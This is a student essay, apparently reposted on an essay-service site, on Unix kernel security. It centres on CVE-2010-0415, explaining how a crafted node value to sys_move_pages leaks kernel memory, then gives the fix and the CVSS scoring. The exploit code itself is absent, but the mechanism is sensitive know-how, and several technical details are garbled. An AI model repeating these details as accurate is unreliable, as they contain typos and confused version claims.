Kernels Role In A Unix System Computer Science Essay

Published:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

The role of a kernel in a Unix system is to control all the input and output and allocates the system's time and memory. Also included in the kernel are file-systems, which is the main mechanism by which computer security is enforced. The file-system also controls how directories and files are stored on the computer hard drive. Though Unix has an appealing methods of how users access files, modify databases and use system resources, they do not help much when the system is not configured correctly or is hit by some malicious software. These will lead to opening which could expose the system to vulnerabilities. From development, as D. Ritchie puts it: "The first fact to face is that UNIX was not developed with security, in any realistic sense, in mind; this fact alone guarantees a vast number of holes." Simple and effective are the words that even in modern computing environments, the system does not protect against flawed or malicious codes. James Morrison (2009) said that "security has been enhanced but is constrained by original Unix design and that the approach is continual retrofit of newer security schemes, rather than fundamental redesign." Failure to employ an effective security results in the system being vulnerable to attacks. This means the system can be affected in an undesirable way or might allow users to have access to information and services without consent or control. Vulnerabilities by definition must be considered in one general sense as destructive and must not be given room to breed. Vulnerability is the end product of poor security which start from within internal or organizational network. Though powerful routers are employed to act in the middle to control traffic as well as to filter what is allowed to go through and what needs to be blocked, less attention is given to the inside end where users work on daily basis and we forget that we can also be a threats in a way, being deliberate or as a mistake. Keven Poulsen(2000) et al wrote that: "No system on a network can be truly safe from the blanket category of "server vulnerability." They can occur not only in the daemons and services on a machine, but also in the operating system itself." Most denial of service is a result of user error or runaway programs rather than explicit attacks. The rapid growth of exploit codes greatly accelerates the denial of service caused by these codes. Though there are many reasons for these simplicity codes to enter the networks, it is common again that the leniency of system administrators has significant contribution in the rise of these attacks. These give intruders a change to explore the system and add malicious codes that could cause denial of service. The initial goal of a Linux attacker is to gain access to a local host by gaining control of root account. Traditionally the super user account has unrestricted access to all components of the system. Even when configured, an attacker with super user privileges has the ability to disable these services and cover their tracks by modifying log files. The intention of someone who causes denial of service is either to damage or to destroy resources so that no one can use them, or to overload some system services or to exhaust some recourses deliberately thus preventing other from using that service.

Though we agree to disagree, S. Garfinkel (1996)(701) wrote that:" Although the Unix security model is basically sound, programmers are careless. Most security flaws in Unix arise from bugs and design errors in programs that runs as root or with other privileges, as a configuration error, or through unanticipated interactions between such programs." These kind of problems result in the opening that gives intruders chance to make changes in our system that results in denial of services and or other worse factors like system crush. Of course being a programming error or not , the bottom line is they leave the system open and in most cases these errors come as part of programmers trying to fix another error and are bound to happen but still stands to be corrected. This is further admitted by Linux developers who agreed that their over judgement resulted in CVE-2010-0415. Eugene Teo (SecurityResponse) admitted that they: " incorrectly depended on the 'node_state/node_isset()' functions testing the node range, rather than checking it explicitly. That's not reliable, even if it might often happen to work."

CVE 2010-0415: Ramonde de Carvalho Valle discovered an issue in the sys_move_ pages interface which was limited to amd64, ia64 and powerpc64 flavors in Debian. It was found that the do{pages_move function in mm/migrate,c in the linux kernel before 2.6.33-rc7 does not validate node values, which allows local users to read arbitrary kernel location.  The Linux kernel is exposed to a local information disclosure issue because kernel memory may be read in user space via the "node" value in the "do_pages_move()" function of the "mm/migrate.c" source file. This issue occurs because node tests in "node_state()" and "node_isset()" functions fail to explicitly test node ranges. This allowed local users to exploit this issue and cause a denial of service (OOPS) (system crash) or to gain access to sensitive kernel memory. Also there was a possibility of other unspecified impact by specifying a node that is not part of the kernel's set node. By having access to the kernel, local users can obtain potential sensitive information which they could use to cause denial of service conditions. A local user can simply supply a crafted value to a sys_move_pages call to access potential sensitive information from kernel memory. Also there is a possibility that a local user can cause the target system to crash. The bug affects Linux kernel versions 2.6.18 and earlier prior to 2.6.33-rc7 and it is located in move pages system call code. By studying an example code, we can work out how the exploit works

CODE

From the above sample code by Xorl, the 'nodes' will be used to determine what the system call will perform and the pointer is controlled by the use. Further the pointer is set to zero and will call do_pages_move(). The function will initially enter the 'for' loop for each piece and enter another in order to fill the list space and it's using it later without performing any range checks. The calls to node_state() and node_isset() will result in the execution of the code located at include/linux/nodemask.h: With the opening now created, a user can now request for any node value. This will lead to inizializing the 'pm[]' pages nodes value with an arbitrary one which will later be returned to the userspace through put_user() in a 'for' loop as you can read in do_pages_move() routine's code. This can lead to serious information leaking. To control the situation, a fix needs to be apply to the system

err = -ENODEV;

+ if (node < 0 || node >= MAX_NUMNODES)

+ goto out_pm;

+

if (!node_state(node, N_HIGH_MEMORY)

This fix code will check that the signed integer 'node' is a positive number and that it does not go beyond the constant 'MAX_NUMNODES' which is defined in include/linux/numa.h

Calculating the extent of an exploit: The Common Vulnerability Scoring System (CVSS) is designed to solves the problem of multiple, incompatible scoring systems and is usable and understandable. It provides an open framework for communicating the characteristics and impacts of IT vulnerabilities. CVSS consists of three groups: Base, Temporal and Environmental. Temporal Metrics contain characteristics of a vulnerability which evolve over the lifetime of vulnerability whereas the environmental Metrics contain those characteristics of a vulnerability which are tied to an implementation in a specific user's environment.As CVE 2010-0415 is still new, only the base metric is calculated. Temporal score and enviromental score are undefined.

There are seven Base Metrics which represent the most fundamental, immutable qualities of a vulnerability. They are Acess Vector, Access Complexity, Authentication, Confedentiality impact, Integrity impact, availability impact and impact bias. To capture how the vulnerability is accessed and whether or not any additional conditions are required to exploit it, Access Vector, Access Complexity, and Authentication metrics are used.These three impact

metrics measure how a vulnerability, if exploited, will directly affect an IT asset, where the impacts are

independently defined as the degree of loss of confidentiality, integrity, and availability. The base metric for CVE-2010-0415 is rated 4.6 with the metric reading (AV:L/AC:L/Au:N/C:P/I:P/A:P) with an expansion of abbreviations below:

Base Metrics Evaluation

………………………….. ………………………………

Access Vector Local Access

Access Complexity Low (L)

Authentication None Required

Confidentiality Impact Partial

Integrity Impact Partial

Availability Impact Partial

……………………….. ………………………………..

This means the Access Vector simply tells how the exploit attacks, whether it attacks the machine locally or Remotely. And for record in this attack the machine is attacked locally. The Access Complexity is used to measure the quantity of attack required to exploit the vulnerability once the access machine is accessedand is rated Low. For this exploit to attack, no authentication is required and confidentiality impact is rated as partial which means not much information is disclosed. Availabilty impact is partial which means interuption in resource availabilty is considerable slow.

Conclusion

The growing numbers of workstations and non Unix mechanisms on the international network, with its implicit assumptions about restricted access to the network, leads to weakened security. Tools have been developed over years and new techniques have been developed to harden Linux hosts in an attempt to curb security threats. Having set the system and placed it up for production is not enough, it is important to checking vendor notices and security forums to ensure that the software is kept current with the latest security issues. This would assist in applying the appropriate security and bug patches, setting up backups, and configuring monitoring tools are essential steps in building a secure system. System updates and patches should be applied at all times to ensure the safe guard of the system and to avoid unnecessary time spent on recovering from an intrusion. Failure to employ the right measures may result in catastrophic loss and openings that could allow more dangerous and harmful employment of codes. Although this helps administrator to remain current with system challenges, it still leaves hosts susceptible to compromise before vulnerabilities are publicly announced and fixes are distributed. Keeping systems up to date with vendor patches will prevent the casual attacker from gaining access to a system, but will not always keep out an attacker that is targeting a system. Also having the correct authorizing right helps to control everything that happen in the system. Atleast all attacks can be prevented by restricting access to critical accounts and files by protecting them from unauthorized users. Also the system administrators should follow the correct security practices in protecting the integrity of the system. These security principle can assist in taking the right measures and making corrections at the right time and they can also assist in tracing vulnerabilities well in time to be reversed. One of the few protection options offered by unix to protect the system from internal or deliberate denial of service is its ability to limit the number of files or processes a user can access. If security policy are adopted and used efficiently, chances of survival are lower than the high risk that can be taken by ignoring what could save the system in time of need.

Writing Services

Essay Writing
Service

Find out how the very best essay writing service can help you accomplish more and achieve higher marks today.

Assignment Writing Service

From complicated assignments to tricky tasks, our experts can tackle virtually any question thrown at them.

Dissertation Writing Service

A dissertation (also known as a thesis or research project) is probably the most important piece of work for any student! From full dissertations to individual chapters, we’re on hand to support you.

Coursework Writing Service

Our expert qualified writers can help you get your coursework right first time, every time.

Dissertation Proposal Service

The first step to completing a dissertation is to create a proposal that talks about what you wish to do. Our experts can design suitable methodologies - perfect to help you get started with a dissertation.

Report Writing
Service

Reports for any audience. Perfectly structured, professionally written, and tailored to suit your exact requirements.

Essay Skeleton Answer Service

If you’re just looking for some help to get started on an essay, our outline service provides you with a perfect essay plan.

Marking & Proofreading Service

Not sure if your work is hitting the mark? Struggling to get feedback from your lecturer? Our premium marking service was created just for you - get the feedback you deserve now.

Exam Revision
Service

Exams can be one of the most stressful experiences you’ll ever have! Revision is key, and we’re here to help. With custom created revision notes and exam answers, you’ll never feel underprepared again.